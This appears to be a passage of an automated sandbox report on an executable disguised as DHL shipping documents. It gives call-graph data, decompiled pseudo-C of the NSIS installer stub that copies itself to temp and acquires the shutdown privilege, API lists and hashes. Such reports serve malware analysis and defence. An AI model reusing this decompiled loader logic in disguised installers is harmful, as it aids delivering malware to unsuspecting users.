406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 
4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 
4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 
4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 
4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                        Control-flow Graph (graph not reproduced; legend: Executed, Not Executed)
                        C-Code - Quality: 78%
                        			_entry_() {
                        				WCHAR* _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
                        				int _v24;
                        				int _v28;
                        				struct _TOKEN_PRIVILEGES _v40;
                        				signed char _v42;
                        				int _v44;
                        				signed int _v48;
                        				intOrPtr _v278;
                        				signed short _v310;
                        				struct _OSVERSIONINFOW _v324;
                        				struct _SHFILEINFOW _v1016;
                        				intOrPtr* _t88;
                        				WCHAR* _t92;
                        				char* _t94;
                        				void _t97;
                        				void* _t116;
                        				WCHAR* _t118;
                        				signed int _t119;
                        				intOrPtr* _t123;
                        				void* _t137;
                        				void* _t143;
                        				void* _t148;
                        				void* _t152;
                        				void* _t157;
                        				signed int _t167;
                        				void* _t170;
                        				void* _t175;
                        				intOrPtr _t177;
                        				intOrPtr _t178;
                        				intOrPtr* _t179;
                        				int _t188;
                        				void* _t189;
                        				void* _t198;
                        				signed int _t204;
                        				signed int _t209;
                        				signed int _t214;
                        				signed int _t216;
                        				int* _t218;
                        				signed int _t226;
                        				signed int _t229;
                        				CHAR* _t231;
                        				char* _t232;
                        				signed int _t233;
                        				WCHAR* _t234;
                        				void* _t250;
                        
                        				_t216 = 0x20;
                        				_t188 = 0;
                        				_v24 = 0;
                        				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                        				_v20 = 0;
                        				SetErrorMode(0x8001); // executed
                        				_v324.szCSDVersion = 0;
                        				_v48 = 0;
                        				_v44 = 0;
                        				_v324.dwOSVersionInfoSize = 0x11c;
                        				if(GetVersionExW( &_v324) == 0) {
                        					_v324.dwOSVersionInfoSize = 0x114;
                        					GetVersionExW( &_v324);
                        					asm("sbb eax, eax");
                        					_v42 = 4;
                        					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                        				}
                        				if(_v324.dwMajorVersion < 0xa) {
                        					_v310 = _v310 & 0x00000000;
                        				}
                        				 *0x42a318 = _v324.dwBuildNumber;
                        				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                        				if( *0x42a31e != 0x600) {
                        					_t179 = E00406A35(_t188);
                        					if(_t179 != _t188) {
                        						 *_t179(0xc00);
                        					}
                        				}
                        				_t231 = "UXTHEME";
                        				do {
                        					E004069C5(_t231); // executed
                        					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                        				} while ( *_t231 != 0);
                        				E00406A35(0xb);
                        				 *0x42a264 = E00406A35(9);
                        				_t88 = E00406A35(7);
                        				if(_t88 != _t188) {
                        					_t88 =  *_t88(0x1e);
                        					if(_t88 != 0) {
                        						 *0x42a31c =  *0x42a31c | 0x00000080;
                        					}
                        				}
                        				__imp__#17();
                        				__imp__OleInitialize(_t188); // executed
                        				 *0x42a320 = _t88;
                        				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                        				E00406668(0x429260, L"NSIS Error");
                        				_t92 = GetCommandLineW();
                        				_t232 = L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"";
                        				E00406668(_t232, _t92);
                        				_t94 = _t232;
                        				_t233 = 0x22;
                        				 *0x42a260 = 0x400000;
                        				_t250 = L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"" - _t233; // 0x22
                        				if(_t250 == 0) {
                        					_t216 = _t233;
                        					_t94 =  &M00435002;
                        				}
                        				_t198 = CharNextW(E00405F64(_t94, _t216));
                        				_v16 = _t198;
                        				while(1) {
                        					_t97 =  *_t198;
                        					_t251 = _t97 - _t188;
                        					if(_t97 == _t188) {
                        						break;
                        					}
                        					_t209 = 0x20;
                        					__eflags = _t97 - _t209;
                        					if(_t97 != _t209) {
                        						L17:
                        						__eflags =  *_t198 - _t233;
                        						_v12 = _t209;
                        						if( *_t198 == _t233) {
                        							_v12 = _t233;
                        							_t198 = _t198 + 2;
                        							__eflags = _t198;
                        						}
                        						__eflags =  *_t198 - 0x2f;
                        						if( *_t198 != 0x2f) {
                        							L32:
                        							_t198 = E00405F64(_t198, _v12);
                        							__eflags =  *_t198 - _t233;
                        							if(__eflags == 0) {
                        								_t198 = _t198 + 2;
                        								__eflags = _t198;
                        							}
                        							continue;
                        						} else {
                        							_t198 = _t198 + 2;
                        							__eflags =  *_t198 - 0x53;
                        							if( *_t198 != 0x53) {
                        								L24:
                        								asm("cdq");
                        								asm("cdq");
                        								_t214 = L"NCRC" & 0x0000ffff;
                        								asm("cdq");
                        								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                        								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                        								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                        									L29:
                        									asm("cdq");
                        									asm("cdq");
                        									_t209 = L" /D=" & 0x0000ffff;
                        									asm("cdq");
                        									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                        									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                        									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                        										L31:
                        										_t233 = 0x22;
                        										goto L32;
                        									}
                        									__eflags =  *_t198 - _t229;
                        									if( *_t198 == _t229) {
                        										 *(_t198 - 4) = _t188;
                        										__eflags = _t198;
                        										E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t198);
                        										L37:
                        										_t234 = L"C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                        										GetTempPathW(0x400, _t234);
                        										_t116 = E0040360F(_t198, _t251);
                        										_t252 = _t116;
                        										if(_t116 != 0) {
                        											L40:
                        											DeleteFileW(L"1033"); // executed
                        											_t118 = E004030D0(_t254, _v20); // executed
                        											_v8 = _t118;
                        											if(_t118 != _t188) {
                        												L68:
                        												ExitProcess(); // executed
                        												__imp__OleUninitialize(); // executed
                        												if(_v8 == _t188) {
                        													if( *0x42a2f4 == _t188) {
                        														L77:
                        														_t119 =  *0x42a30c;
                        														if(_t119 != 0xffffffff) {
                        															_v24 = _t119;
                        														}
                        														ExitProcess(_v24);
                        													}
                        													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                        														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                        														_v40.PrivilegeCount = 1;
                        														_v28 = 2;
                        														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                        													}
                        													_t123 = E00406A35(4);
                        													if(_t123 == _t188) {
                        														L75:
                        														if(ExitWindowsEx(2, 0x80040002) != 0) {
                        															goto L77;
                        														}
                        														goto L76;
                        													} else {
                        														_push(0x80040002);
                        														_push(0x25);
                        														_push(_t188);
                        														_push(_t188);
                        														_push(_t188);
                        														if( *_t123() == 0) {
                        															L76:
                        															E0040140B(9);
                        															goto L77;
                        														}
                        														goto L75;
                        													}
                        												}
                        												E00405CC8(_v8, 0x200010);
                        												ExitProcess(2);
                        											}
                        											if( *0x42a27c == _t188) {
                        												L51:
                        												 *0x42a30c =  *0x42a30c | 0xffffffff;
                        												_v24 = E00403D17(_t264);
                        												goto L68;
                        											}
                        											_t218 = E00405F64(L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"", _t188);
                        											if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"") {
                        												L48:
                        												_t263 = _t218 - L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"";
                        												_v8 = L"Error launching installer";
                        												if(_t218 < L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"") {
                        													_t189 = E00405C33(__eflags);
                        													lstrcatW(_t234, L"~nsu");
                        													__eflags = _t189;
                        													if(_t189 != 0) {
                        														lstrcatW(_t234, "A");
                        													}
                        													lstrcatW(_t234, L".tmp");
                        													_t219 = L"C:\\Users\\hardz\\Desktop";
                        													_t137 = lstrcmpiW(_t234, L"C:\\Users\\hardz\\Desktop");
                        													__eflags = _t137;
                        													if(_t137 == 0) {
                        														L67:
                        														_t188 = 0;
                        														__eflags = 0;
                        														goto L68;
                        													} else {
                        														__eflags = _t189;
                        														_push(_t234);
                        														if(_t189 == 0) {
                        															E00405C16();
                        														} else {
                        															E00405B99();
                        														}
                        														SetCurrentDirectoryW(_t234);
                        														__eflags = L"C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                        														if(__eflags == 0) {
                        															E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t219);
                        														}
                        														E00406668(0x42b000, _v16);
                        														_t201 = "A" & 0x0000ffff;
                        														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                        														__eflags = _t143;
                        														_v12 = 0x1a;
                        														 *0x42b800 = _t143;
                        														do {
                        															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                        															DeleteFileW(0x420f08);
                        															__eflags = _v8;
                        															if(_v8 != 0) {
                        																_t148 = CopyFileW(L"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe", 0x420f08, 1);
                        																__eflags = _t148;
                        																if(_t148 != 0) {
                        																	E00406428(_t201, 0x420f08, 0);
                        																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                        																	_t152 = E00405C4B(0x420f08);
                        																	__eflags = _t152;
                        																	if(_t152 != 0) {
                        																		CloseHandle(_t152);
                        																		_v8 = 0;
                        																	}
                        																}
                        															}
                        															 *0x42b800 =  *0x42b800 + 1;
                        															_t61 =  &_v12;
                        															 *_t61 = _v12 - 1;
                        															__eflags =  *_t61;
                        														} while ( *_t61 != 0);
                        														E00406428(_t201, _t234, 0);
                        														goto L67;
                        													}
                        												}
                        												 *_t218 = _t188;
                        												_t221 =  &(_t218[2]);
                        												_t157 = E0040603F(_t263,  &(_t218[2]));
                        												_t264 = _t157;
                        												if(_t157 == 0) {
                        													goto L68;
                        												}
                        												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
                        												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t221);
                        												_v8 = _t188;
                        												goto L51;
                        											}
                        											asm("cdq");
                        											asm("cdq");
                        											asm("cdq");
                        											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                        											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                        											while( *_t218 != _t204 || _t218[1] != _t167) {
                        												_t218 = _t218;
                        												if(_t218 >= L"\"C:\\Users\\hardz\\Desktop\\DHL AWB SHIPPING DOCS_AWB_0009123.exe\"") {
                        													continue;
                        												}
                        												break;
                        											}
                        											_t188 = 0;
                        											goto L48;
                        										}
                        										GetWindowsDirectoryW(_t234, 0x3fb);
                        										lstrcatW(_t234, L"\\Temp");
                        										_t170 = E0040360F(_t198, _t252);
                        										_t253 = _t170;
                        										if(_t170 != 0) {
                        											goto L40;
                        										}
                        										GetTempPathW(0x3fc, _t234);
                        										lstrcatW(_t234, L"Low");
                        										SetEnvironmentVariableW(L"TEMP", _t234);
                        										SetEnvironmentVariableW(L"TMP", _t234);
                        										_t175 = E0040360F(_t198, _t253);
                        										_t254 = _t175;
                        										if(_t175 == 0) {
                        											goto L68;
                        										}
                        										goto L40;
                        									}
                        									goto L31;
                        								}
                        								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                        								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                        									goto L29;
                        								}
                        								_t177 =  *((intOrPtr*)(_t198 + 8));
                        								__eflags = _t177 - 0x20;
                        								if(_t177 == 0x20) {
                        									L28:
                        									_t36 =  &_v20;
                        									 *_t36 = _v20 | 0x00000004;
                        									__eflags =  *_t36;
                        									goto L29;
                        								}
                        								__eflags = _t177 - _t188;
                        								if(_t177 != _t188) {
                        									goto L29;
                        								}
                        								goto L28;
                        							}
                        							_t178 =  *((intOrPtr*)(_t198 + 2));
                        							__eflags = _t178 - _t209;
                        							if(_t178 == _t209) {
                        								L23:
                        								 *0x42a300 = 1;
                        								goto L24;
                        							}
                        							__eflags = _t178 - _t188;
                        							if(_t178 != _t188) {
                        								goto L24;
                        							}
                        							goto L23;
                        						}
                        					} else {
                        						goto L16;
                        					}
                        					do {
                        						L16:
                        						_t198 = _t198 + 2;
                        						__eflags =  *_t198 - _t209;
                        					} while ( *_t198 == _t209);
                        					goto L17;
                        				}
                        				goto L37;
                        			}

                        APIs
                        • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                        • GetVersionExW.KERNEL32(?), ref: 0040368C
                        • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                        • OleInitialize.OLE32(00000000), ref: 0040377D
                        • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                        • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe",00000020,"C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe",00000000), ref: 004037E9
                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                        • DeleteFileW.KERNELBASE(1033), ref: 00403982
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                          • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe",00000000,?), ref: 00403A8F
                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                        • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,00420F08,00000001), ref: 00403B21
                        • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                        • ExitProcess.KERNEL32(?), ref: 00403B6C
                        • OleUninitialize.OLE32(?), ref: 00403B71
                        • ExitProcess.KERNEL32 ref: 00403B8B
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                        • ExitWindowsEx.USER32 ref: 00403BFE
                        • ExitProcess.KERNEL32 ref: 00403C1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                        • String ID: "C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                        • API String ID: 2292928366-4095228552
                        • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                        • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                        • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                        • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v8;
                        				signed int _v12;
                        				short _v556;
                        				short _v558;
                        				struct _WIN32_FIND_DATAW _v604;
                        				signed int _t38;
                        				signed int _t52;
                        				signed int _t55;
                        				signed int _t62;
                        				void* _t64;
                        				signed char _t65;
                        				WCHAR* _t66;
                        				void* _t67;
                        				WCHAR* _t68;
                        				void* _t70;
                        
                        				_t65 = _a8;
                        				_t68 = _a4;
                        				_v8 = _t65 & 0x00000004;
                        				_t38 = E0040603F(__eflags, _t68);
                        				_v12 = _t38;
                        				if((_t65 & 0x00000008) != 0) {
                        					_t62 = DeleteFileW(_t68); // executed
                        					asm("sbb eax, eax");
                        					_t64 =  ~_t62 + 1;
                        					 *0x42a2e8 =  *0x42a2e8 + _t64;
                        					return _t64;
                        				}
                        				_a4 = _t65;
                        				_t8 =  &_a4;
                        				 *_t8 = _a4 & 0x00000001;
